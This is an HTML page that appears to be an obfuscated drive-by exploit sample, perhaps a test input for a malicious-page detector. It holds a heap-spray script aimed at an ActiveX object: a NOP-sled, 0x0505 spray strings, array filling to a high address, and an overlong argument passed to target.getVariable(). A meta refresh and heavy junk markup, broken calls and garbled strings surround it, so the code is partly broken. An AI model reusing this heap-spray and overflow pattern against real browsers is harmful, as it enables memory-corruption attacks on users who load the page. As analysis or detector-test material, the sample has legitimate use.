<html>
<head>
    <title><iframe HiDDeN="TrUe"></iframe></title>
<meta http-equiv="refresh" content="0;URL='http://index.php?spl=/'" />
<object classid='clsid:E23fE9C6-778E-49D4-B537-38FCDE4887D8' id='target' ></object>
</head>
<body>
<img src=""><!--sdfjhksd-->asdhasjk</img>
<meta>sdfsdf/*ываыв*/</meta>
<h1><!--asdadsfsdf--><h1><h7></h7></h1></h1>
  <script type="text/javascript">
      /*""*/
      t.charAt (
      /*sdfsd*/
      iframe
              <object id='target' classid='clsid:E23fE9C6-778E-49D4-B537-38FCDE4887D8'  ></object>
      var object = sdf;
      var t = eval()
      var a = setTimeout()
      var b = setTimeout()
      var c = setTimeout()
      var d = setInterval()
      var e = setInterval() 'iframe'
    var mm = null;
      var Array = sdfw;
      var x038 = sdf
      e = 'default';
      e=t='sdf';

      e = 'unescape()'
      e = 'escape()'
      e = escape()'escape()
      var param2 = unescape("\x0505\x0505");
eval()

    if( target != null )
    {
      var param1 = unescape("%u0505%u0505");
      var salame = "defaultV";
      var salame2 = 1;
      var salame3 = 0;

      ag  = unescape("%uCCCC%uCCCC");
      sh  =
unescape("%u9090%u9090%u9090%u9090%'u9090%u9090%u9090%u9090%");
      sz  = sh.length * 2;
      npsz = 0x400000 - (sz + 0x38);
      nps = unescape("%u0505%u0505");

      while(nps.length * 2 < npsz) nps += nps;
      ihbc = (0x0E000000 - 0x400000) / 0x400000;
      mm  = new Array();

      for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;

      for(var i=0;i<2000;i++)
        param1 = param1 + unescape("%u0505%u0505");
             
      target.getVariable (param1);
    }
  </script>
<P>
<INS><DIV><p></p></DIV></INS>
</P>
<script SRC="../myScript.jS" type="TEXT/javascript">
    alert("some")
</script>
</body>
<frame>sd</frame>
</html>
<iframe></iframe>
<!-- <body>
 <h1>name</h1>
 </body>-->